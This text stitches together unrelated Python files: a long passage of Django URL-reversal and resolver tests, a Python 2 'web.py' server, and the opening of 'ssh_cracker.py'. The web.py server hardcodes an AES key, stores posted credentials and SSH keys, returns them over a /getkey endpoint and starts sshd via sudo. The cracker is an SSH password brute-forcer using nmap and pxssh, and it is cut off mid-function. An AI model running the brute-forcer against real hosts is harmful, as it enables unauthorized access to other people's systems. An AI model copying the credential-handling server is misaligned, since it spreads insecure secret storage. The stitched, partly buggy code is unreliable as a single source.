self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_simple_included_name(self):
"""Normal lookups work on names included from other patterns."""
test_urls = [
('included_namespace_urls:inc-normal-view', [], {}, '/included/normal/'),
('included_namespace_urls:inc-normal-view', [37, 42], {}, '/included/normal/37/42/'),
('included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/included/normal/42/37/'),
('included_namespace_urls:inc-special-view', [], {}, '/included/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_object(self):
"""Dynamic URL objects can be found using a namespace."""
test_urls = [
('test-ns1:urlobject-view', [], {}, '/test1/inner/'),
('test-ns1:urlobject-view', [37, 42], {}, '/test1/inner/37/42/'),
('test-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/test1/inner/42/37/'),
('test-ns1:urlobject-special-view', [], {}, '/test1/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object(self):
"""
Dynamic URL objects can return a (pattern, app_name) 2-tuple, and
include() can set the namespace.
"""
test_urls = [
('new-ns1:urlobject-view', [], {}, '/newapp1/inner/'),
('new-ns1:urlobject-view', [37, 42], {}, '/newapp1/inner/37/42/'),
('new-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/newapp1/inner/42/37/'),
('new-ns1:urlobject-special-view', [], {}, '/newapp1/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object_default_namespace(self):
"""
Namespace defaults to app_name when including a (pattern, app_name)
2-tuple.
"""
test_urls = [
('newapp:urlobject-view', [], {}, '/new-default/inner/'),
('newapp:urlobject-view', [37, 42], {}, '/new-default/inner/37/42/'),
('newapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/new-default/inner/42/37/'),
('newapp:urlobject-special-view', [], {}, '/new-default/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_embedded_namespace_object(self):
"""Namespaces can be installed anywhere in the URL pattern tree."""
test_urls = [
('included_namespace_urls:test-ns3:urlobject-view', [], {}, '/included/test3/inner/'),
('included_namespace_urls:test-ns3:urlobject-view', [37, 42], {}, '/included/test3/inner/37/42/'),
(
'included_namespace_urls:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/included/test3/inner/42/37/',
),
('included_namespace_urls:test-ns3:urlobject-special-view', [], {}, '/included/test3/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern(self):
"""Namespaces can be applied to include()'d urlpatterns."""
test_urls = [
('inc-ns1:inc-normal-view', [], {}, '/ns-included1/normal/'),
('inc-ns1:inc-normal-view', [37, 42], {}, '/ns-included1/normal/37/42/'),
('inc-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/ns-included1/normal/42/37/'),
('inc-ns1:inc-special-view', [], {}, '/ns-included1/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_name_pattern(self):
"""
Namespaces can be applied to include()'d urlpatterns that set an
app_name attribute.
"""
test_urls = [
('app-ns1:inc-normal-view', [], {}, '/app-included1/normal/'),
('app-ns1:inc-normal-view', [37, 42], {}, '/app-included1/normal/37/42/'),
('app-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/app-included1/normal/42/37/'),
('app-ns1:inc-special-view', [], {}, '/app-included1/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern_with_variable_prefix(self):
"""
Using include() with namespaces when there is a regex variable in front
of it.
"""
test_urls = [
('inc-outer:inc-normal-view', [], {'outer': 42}, '/ns-outer/42/normal/'),
('inc-outer:inc-normal-view', [42], {}, '/ns-outer/42/normal/'),
('inc-outer:inc-normal-view', [], {'arg1': 37, 'arg2': 4, 'outer': 42}, '/ns-outer/42/normal/37/4/'),
('inc-outer:inc-normal-view', [42, 37, 4], {}, '/ns-outer/42/normal/37/4/'),
('inc-outer:inc-special-view', [], {'outer': 42}, '/ns-outer/42/+%5C$*/'),
('inc-outer:inc-special-view', [42], {}, '/ns-outer/42/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_multiple_namespace_pattern(self):
"""Namespaces can be embedded."""
test_urls = [
('inc-ns1:test-ns3:urlobject-view', [], {}, '/ns-included1/test3/inner/'),
('inc-ns1:test-ns3:urlobject-view', [37, 42], {}, '/ns-included1/test3/inner/37/42/'),
(
'inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/ns-included1/test3/inner/42/37/',
),
('inc-ns1:test-ns3:urlobject-special-view', [], {}, '/ns-included1/test3/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_namespace_pattern(self):
"""Namespaces can be nested."""
test_urls = [
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [37, 42], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/37/42/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/ns-included1/ns-included4/ns-included1/test3/inner/42/37/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view', [], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/',
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object(self):
"""A default application namespace can be used for lookup."""
test_urls = [
('testapp:urlobject-view', [], {}, '/default/inner/'),
('testapp:urlobject-view', [37, 42], {}, '/default/inner/37/42/'),
('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/default/inner/42/37/'),
('testapp:urlobject-special-view', [], {}, '/default/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object_with_default(self):
"""A default application namespace is sensitive to the current app."""
test_urls = [
('testapp:urlobject-view', [], {}, 'test-ns3', '/default/inner/'),
('testapp:urlobject-view', [37, 42], {}, 'test-ns3', '/default/inner/37/42/'),
('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'test-ns3', '/default/inner/42/37/'),
('testapp:urlobject-special-view', [], {}, 'test-ns3', '/default/inner/+%5C$*/'),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_app_lookup_object_without_default(self):
"""
An application namespace without a default is sensitive to the current
app.
"""
test_urls = [
('nodefault:urlobject-view', [], {}, None, '/other2/inner/'),
('nodefault:urlobject-view', [37, 42], {}, None, '/other2/inner/37/42/'),
('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/other2/inner/42/37/'),
('nodefault:urlobject-special-view', [], {}, None, '/other2/inner/+%5C$*/'),
('nodefault:urlobject-view', [], {}, 'other-ns1', '/other1/inner/'),
('nodefault:urlobject-view', [37, 42], {}, 'other-ns1', '/other1/inner/37/42/'),
('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'other-ns1', '/other1/inner/42/37/'),
('nodefault:urlobject-special-view', [], {}, 'other-ns1', '/other1/inner/+%5C$*/'),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_special_chars_namespace(self):
test_urls = [
('special:included_namespace_urls:inc-normal-view', [], {}, '/+%5C$*/included/normal/'),
('special:included_namespace_urls:inc-normal-view', [37, 42], {}, '/+%5C$*/included/normal/37/42/'),
(
'special:included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37},
'/+%5C$*/included/normal/42/37/',
),
('special:included_namespace_urls:inc-special-view', [], {}, '/+%5C$*/included/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespaces_with_variables(self):
"""Namespace prefixes can capture variables."""
test_urls = [
('inc-ns5:inner-nothing', [], {'outer': '70'}, '/inc70/'),
('inc-ns5:inner-extra', [], {'extra': 'foobar', 'outer': '78'}, '/inc78/extra/foobar/'),
('inc-ns5:inner-nothing', ['70'], {}, '/inc70/'),
('inc-ns5:inner-extra', ['78', 'foobar'], {}, '/inc78/extra/foobar/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_app_lookup(self):
"""
        A nested current_app should be split into individual namespaces (#24904).
"""
test_urls = [
('inc-ns1:testapp:urlobject-view', [], {}, None, '/ns-included1/test4/inner/'),
('inc-ns1:testapp:urlobject-view', [37, 42], {}, None, '/ns-included1/test4/inner/37/42/'),
('inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/ns-included1/test4/inner/42/37/'),
('inc-ns1:testapp:urlobject-special-view', [], {}, None, '/ns-included1/test4/inner/+%5C$*/'),
('inc-ns1:testapp:urlobject-view', [], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/'),
('inc-ns1:testapp:urlobject-view', [37, 42], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/37/42/'),
(
'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'inc-ns1:test-ns3',
'/ns-included1/test3/inner/42/37/',
),
(
'inc-ns1:testapp:urlobject-special-view', [], {}, 'inc-ns1:test-ns3',
'/ns-included1/test3/inner/+%5C$*/',
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_current_app_no_partial_match(self):
"""current_app shouldn't be used unless it matches the whole path."""
test_urls = [
('inc-ns1:testapp:urlobject-view', [], {}, 'nonexistent:test-ns3', '/ns-included1/test4/inner/'),
(
'inc-ns1:testapp:urlobject-view', [37, 42], {}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/37/42/',
),
(
'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/42/37/',
),
(
'inc-ns1:testapp:urlobject-special-view', [], {}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/+%5C$*/',
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
@override_settings(ROOT_URLCONF=urlconf_outer.__name__)
class RequestURLconfTests(SimpleTestCase):
def test_urlconf(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
]
)
def test_urlconf_overridden(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:,inner:/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.NullChangeURLconfMiddleware' % middleware.__name__,
]
)
def test_urlconf_overridden_with_null(self):
"""
Overriding request.urlconf with None will fall back to the default
URLconf.
"""
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInResponseMiddleware' % middleware.__name__,
]
)
def test_reverse_inner_in_response_middleware(self):
"""
        Test reversing a URL from the *overridden* URLconf from inside
a response middleware.
"""
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInResponseMiddleware' % middleware.__name__,
]
)
def test_reverse_outer_in_response_middleware(self):
"""
        Test reversing a URL from the *default* URLconf from inside
a response middleware.
"""
msg = (
"Reverse for 'outer' not found. 'outer' is not a valid view "
"function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
self.client.get('/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInStreaming' % middleware.__name__,
]
)
def test_reverse_inner_in_streaming(self):
"""
        Test reversing a URL from the *overridden* URLconf from inside
a streaming response.
"""
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(b''.join(response), b'/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInStreaming' % middleware.__name__,
]
)
def test_reverse_outer_in_streaming(self):
"""
        Test reversing a URL from the *default* URLconf from inside
a streaming response.
"""
message = "Reverse for 'outer' not found."
with self.assertRaisesMessage(NoReverseMatch, message):
self.client.get('/second_test/')
b''.join(self.client.get('/second_test/'))
def test_urlconf_is_reset_after_request(self):
"""The URLconf is reset after each request."""
self.assertIsNone(get_urlconf())
with override_settings(MIDDLEWARE=['%s.ChangeURLconfMiddleware' % middleware.__name__]):
self.client.get(reverse('inner'))
self.assertIsNone(get_urlconf())
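# Purely illustrative sketch: the ChangeURLconfMiddleware referenced in the
# settings overrides above lives in urlpatterns_reverse.middleware. A minimal
# middleware that swaps the URLconf per request could look roughly like this;
# the class name and the target URLconf module below are hypothetical.
class _ExampleChangeURLconfMiddleware:
    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        # Setting request.urlconf makes Django resolve this request against
        # the given URLconf module instead of settings.ROOT_URLCONF.
        request.urlconf = 'urlpatterns_reverse.urlconf_inner'
        return self.get_response(request)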
class ErrorHandlerResolutionTests(SimpleTestCase):
"""Tests for handler400, handler404 and handler500"""
def setUp(self):
urlconf = 'urlpatterns_reverse.urls_error_handlers'
urlconf_callables = 'urlpatterns_reverse.urls_error_handlers_callables'
self.resolver = URLResolver(RegexPattern(r'^$'), urlconf)
self.callable_resolver = URLResolver(RegexPattern(r'^$'), urlconf_callables)
def test_named_handlers(self):
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.resolver.resolve_error_handler(code), empty_view)
def test_callable_handlers(self):
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.callable_resolver.resolve_error_handler(code), empty_view)
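# Purely illustrative: URLconfs of the kind resolved above assign error
# handlers at module level, either as a dotted path or as a callable. This is
# a hypothetical sketch, not the actual urls_error_handlers modules used here.
#
#     from .views import empty_view
#
#     urlpatterns = []
#     handler400 = 'urlpatterns_reverse.views.empty_view'  # dotted-path form
#     handler404 = empty_view                               # callable form
#     handler500 = empty_view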
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls_without_handlers')
class DefaultErrorHandlerTests(SimpleTestCase):
def test_default_handler(self):
"If the urls.py doesn't specify handlers, the defaults are used"
response = self.client.get('/test/')
self.assertEqual(response.status_code, 404)
msg = "I don't think I'm getting good value for this view"
with self.assertRaisesMessage(ValueError, msg):
self.client.get('/bad_view/')
@override_settings(ROOT_URLCONF=None)
class NoRootUrlConfTests(SimpleTestCase):
"""Tests for handler404 and handler500 if ROOT_URLCONF is None"""
def test_no_handler_exception(self):
msg = (
"The included URLconf 'None' does not appear to have any patterns "
"in it. If you see the 'urlpatterns' variable with valid patterns "
"in the file then the issue is probably caused by a circular "
"import."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.client.get('/test/me/')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class ResolverMatchTests(SimpleTestCase):
def test_urlpattern_resolve(self):
for path_, url_name, app_name, namespace, view_name, func, args, kwargs in resolve_test_data:
with self.subTest(path=path_):
# Legacy support for extracting "function, args, kwargs".
match_func, match_args, match_kwargs = resolve(path_)
self.assertEqual(match_func, func)
self.assertEqual(match_args, args)
self.assertEqual(match_kwargs, kwargs)
# ResolverMatch capabilities.
match = resolve(path_)
self.assertEqual(match.__class__, ResolverMatch)
self.assertEqual(match.url_name, url_name)
self.assertEqual(match.app_name, app_name)
self.assertEqual(match.namespace, namespace)
self.assertEqual(match.view_name, view_name)
self.assertEqual(match.func, func)
self.assertEqual(match.args, args)
self.assertEqual(match.kwargs, kwargs)
# and for legacy purposes:
self.assertEqual(match[0], func)
self.assertEqual(match[1], args)
self.assertEqual(match[2], kwargs)
def test_resolver_match_on_request(self):
response = self.client.get('/resolver_match/')
resolver_match = response.resolver_match
self.assertEqual(resolver_match.url_name, 'test-resolver-match')
def test_resolver_match_on_request_before_resolution(self):
request = HttpRequest()
self.assertIsNone(request.resolver_match)
def test_repr(self):
self.assertEqual(
repr(resolve('/no_kwargs/42/37/')),
"ResolverMatch(func=urlpatterns_reverse.views.empty_view, "
"args=('42', '37'), kwargs={}, url_name='no-kwargs', app_names=[], "
"namespaces=[], route='^no_kwargs/([0-9]+)/([0-9]+)/$')",
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
def test_repr_functools_partial(self):
tests = [
('partial', 'template.html'),
('partial_nested', 'nested_partial.html'),
('partial_wrapped', 'template.html'),
]
for name, template_name in tests:
with self.subTest(name=name):
func = (
f"functools.partial({views.empty_view!r}, "
f"template_name='{template_name}')"
)
self.assertEqual(
repr(resolve(f'/{name}/')),
f"ResolverMatch(func={func}, args=(), kwargs={{}}, "
f"url_name='{name}', app_names=[], namespaces=[], "
f"route='{name}/')",
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.erroneous_urls')
class ErroneousViewTests(SimpleTestCase):
def test_noncallable_view(self):
# View is not a callable (explicit import; arbitrary Python object)
with self.assertRaisesMessage(TypeError, 'view must be a callable'):
path('uncallable-object/', views.uncallable)
def test_invalid_regex(self):
# Regex contains an error (refs #6170)
msg = '(regex_error/$" is not a valid regular expression'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
reverse(views.empty_view)
class ViewLoadingTests(SimpleTestCase):
def test_view_loading(self):
self.assertEqual(get_callable('urlpatterns_reverse.views.empty_view'), empty_view)
self.assertEqual(get_callable(empty_view), empty_view)
def test_view_does_not_exist(self):
msg = "View does not exist in module urlpatterns_reverse.views."
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.views.i_should_not_exist')
def test_attributeerror_not_hidden(self):
msg = 'I am here to confuse django.urls.get_callable'
with self.assertRaisesMessage(AttributeError, msg):
get_callable('urlpatterns_reverse.views_broken.i_am_broken')
def test_non_string_value(self):
msg = "'1' is not a callable or a dot-notation path"
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable(1)
def test_string_without_dot(self):
msg = "Could not import 'test'. The path must be fully qualified."
with self.assertRaisesMessage(ImportError, msg):
get_callable('test')
def test_module_does_not_exist(self):
with self.assertRaisesMessage(ImportError, "No module named 'foo'"):
get_callable('foo.bar')
def test_parent_module_does_not_exist(self):
msg = 'Parent module urlpatterns_reverse.foo does not exist.'
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.foo.bar')
def test_not_callable(self):
msg = (
"Could not import 'urlpatterns_reverse.tests.resolve_test_data'. "
"View is not callable."
)
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable('urlpatterns_reverse.tests.resolve_test_data')
class IncludeTests(SimpleTestCase):
url_patterns = [
path('inner/', views.empty_view, name='urlobject-view'),
re_path(r'^inner/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$', views.empty_view, name='urlobject-view'),
re_path(r'^inner/\+\\\$\*/$', views.empty_view, name='urlobject-special-view'),
]
app_urls = URLObject('inc-app')
def test_include_urls(self):
self.assertEqual(include(self.url_patterns), (self.url_patterns, None, None))
def test_include_namespace(self):
msg = (
'Specifying a namespace in include() without providing an '
'app_name is not supported.'
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include(self.url_patterns, 'namespace')
def test_include_4_tuple(self):
msg = 'Passing a 4-tuple to include() is not supported.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace', 'blah'))
def test_include_3_tuple(self):
msg = 'Passing a 3-tuple to include() is not supported.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace'))
def test_include_3_tuple_namespace(self):
msg = 'Cannot override the namespace for a dynamic module that provides a namespace.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, 'app_name', 'namespace'), 'namespace')
def test_include_2_tuple(self):
self.assertEqual(
include((self.url_patterns, 'app_name')),
(self.url_patterns, 'app_name', 'app_name')
)
def test_include_2_tuple_namespace(self):
self.assertEqual(
include((self.url_patterns, 'app_name'), namespace='namespace'),
(self.url_patterns, 'app_name', 'namespace')
)
def test_include_app_name(self):
self.assertEqual(
include(self.app_urls),
(self.app_urls, 'inc-app', 'inc-app')
)
def test_include_app_name_namespace(self):
self.assertEqual(
include(self.app_urls, 'namespace'),
(self.app_urls, 'inc-app', 'namespace')
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class LookaheadTests(SimpleTestCase):
def test_valid_resolve(self):
test_urls = [
'/lookahead-/a-city/',
'/lookbehind-/a-city/',
'/lookahead+/a-city/',
'/lookbehind+/a-city/',
]
for test_url in test_urls:
with self.subTest(url=test_url):
self.assertEqual(resolve(test_url).kwargs, {'city': 'a-city'})
def test_invalid_resolve(self):
test_urls = [
'/lookahead-/not-a-city/',
'/lookbehind-/not-a-city/',
'/lookahead+/other-city/',
'/lookbehind+/other-city/',
]
for test_url in test_urls:
with self.subTest(url=test_url):
with self.assertRaises(Resolver404):
resolve(test_url)
def test_valid_reverse(self):
test_urls = [
('lookahead-positive', {'city': 'a-city'}, '/lookahead+/a-city/'),
('lookahead-negative', {'city': 'a-city'}, '/lookahead-/a-city/'),
('lookbehind-positive', {'city': 'a-city'}, '/lookbehind+/a-city/'),
('lookbehind-negative', {'city': 'a-city'}, '/lookbehind-/a-city/'),
]
for name, kwargs, expected in test_urls:
with self.subTest(name=name, kwargs=kwargs):
self.assertEqual(reverse(name, kwargs=kwargs), expected)
def test_invalid_reverse(self):
test_urls = [
('lookahead-positive', {'city': 'other-city'}),
('lookahead-negative', {'city': 'not-a-city'}),
('lookbehind-positive', {'city': 'other-city'}),
('lookbehind-negative', {'city': 'not-a-city'}),
]
for name, kwargs in test_urls:
with self.subTest(name=name, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, kwargs=kwargs)
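# Tying the namespace behaviour exercised above together, a minimal pair of
# URLconfs might look like the sketch below. This is purely illustrative; the
# module and view names are hypothetical, not part of this test suite.
#
#     # polls/urls.py
#     from django.urls import path
#     from . import views
#     app_name = 'polls'  # application namespace
#     urlpatterns = [path('', views.index, name='index')]
#
#     # project/urls.py
#     from django.urls import include, path
#     urlpatterns = [
#         path('polls/', include('polls.urls', namespace='site-polls')),
#     ]
#
# reverse('polls:index') resolves via the default application namespace, while
# reverse('site-polls:index') uses the instance namespace set by include().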
|
web.py
|
import BaseHTTPServer, SimpleHTTPServer
import ssl
import tempfile
import os
import AESCipher
import mycerts
import threading
import time
from urlparse import urlparse, parse_qs
import json
import subprocess
aes = AESCipher.AESCipher('Content-type: text/json') # Guess what's this? :-)
server_crt_file = tempfile.NamedTemporaryFile(dir="/tmp", delete=True)
server_crt_file.write(aes.decrypt(mycerts.server_crt))
server_crt_file.flush()
server_key_file = tempfile.NamedTemporaryFile(dir="/tmp", delete=True)
server_key_file.write(aes.decrypt(mycerts.server_key))
server_key_file.flush()
client_list_file = tempfile.NamedTemporaryFile(dir="/tmp", delete=True)
client_list_file.write(aes.decrypt(mycerts.client_list_crt))
client_list_file.flush()
globs = {}
class WebServer(BaseHTTPServer.BaseHTTPRequestHandler, object):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
def _handle_input(self):
self._who = "local"
self._ip = self.client_address[0]
if hasattr(self.connection, 'getpeercert'):
self._who = self.connection.getpeercert()['subject'][3][0][1]
self._query = parse_qs(urlparse(self.path).query)
for k in self._query:
if type(self._query[k]) is list and len(self._query[k]) == 1:
self._query[k] = self._query[k][0]
self._path = urlparse(self.path).path
# Try content-length
self._post_data = ''
self._post_obj = {}
if 'content-length' in self.headers:
content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
self._post_data = self.rfile.read(content_length)
try:
obj = json.loads(self._post_data)
if 'enc' in obj:
self._post_obj = json.loads(aes.decrypt(obj['enc']))
except Exception as ex:
print "Exception: %s" % (ex)
def _ok_resp(self, msg):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps({"status": "ok", "message": msg}))
def _error_resp(self, code, error=""):
self.send_response(code)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps({"status": "error", "error": error}))
def do_GET(self):
self._handle_input()
print "%s %s %s %s %s" % (self._post_data, self._query, self._path, self._who, self._post_obj)
if self._path == '/getkey' and self._ip == "127.0.0.1" and 'key' in self._query:
if self._query['key'] in globs:
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(globs[self._query['key']])
return
self._error_resp(404)
def do_POST(self):
self._handle_input()
#print "%s %s %s %s %s" % (self._post_data, self._query, self._path, self._who, self._post_obj)
if self._path == '/connect':
if len(self._post_obj) == 0:
return self._error_resp(500, "No credentials provided")
for k in self._post_obj:
globs[k] = self._post_obj[k]
return self._ok_resp()
if self._path == '/ssh_connect':
if 'ssh_key' not in self._post_obj:
return self._error_resp(500, "No credentials provided")
globs['ssh_key'] = self._post_obj['ssh_key']
try:
out = subprocess.check_output("sudo systemctl start ssh", shell=True)
return self._ok_resp(out)
except Exception as ex:
return self._error_resp(500, str(ex))
if self._path == '/encrypt_connect':
if len(self._post_obj) == 0:
return self._error_resp(500, "No credentials provided")
for k in self._post_obj:
globs[k] = self._post_obj[k]
return self._ok_resp()
return self._error_resp(404)
def serve_forever(httpd):
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
finally:
httpd.server_close()
def local_server(httpd):
httpd.serve_forever()
def main():
secure_httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 4443), WebServer)
secure_httpd.socket = ssl.wrap_socket (secure_httpd.socket,
certfile=server_crt_file.name,
keyfile=server_key_file.name,
server_side=True,
cert_reqs=ssl.CERT_REQUIRED, ca_certs=client_list_file.name)
secure_thread = threading.Thread(target=lambda: serve_forever(secure_httpd))
secure_thread.start()
local_httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 8080), WebServer)
local_thread = threading.Thread(target=lambda: serve_forever(local_httpd))
local_thread.start()
try:
while 1:
time.sleep(10)
except KeyboardInterrupt:
print("Exiting")
secure_httpd.shutdown()
local_httpd.shutdown()
secure_thread.join()
local_thread.join()
main()
|
ssh_cracker.py
|
import threading
from threading import Thread
import time
import argparse
from pexpect import pxssh
import nmap
Found = False
Fails = 0
maxConnections = 5
connection_lock = threading.BoundedSemaphore(maxConnections)
def help():
print ("author to show author name")
print ("help to show this massage")
print ("info To show description of the tool ")
print ("show_options to show options of Tools")
print ("")
def options():
print ("options value")
print ("========== ============")
print ("host ",host)
print(" \033[95mYou Must Enter URL with Protocol (Example : https://site.com or http://site.com)")
print(" \033[95mYou Must Write / at The End of URL EX: www.site.com/")
def nmapScan(tgtHost):
nmapScan = nmap.PortScanner()
nmapScan.scan(tgtHost, '22')
state = nmapScan[tgtHost]['tcp'][22]['state']
return state
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print('\n===========================================================')
print('\n[+] Password Found: {}\n'.format(password.decode('utf-8')))
print('===========================================================\n')
Found = True
s.logout()
except Exception as e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
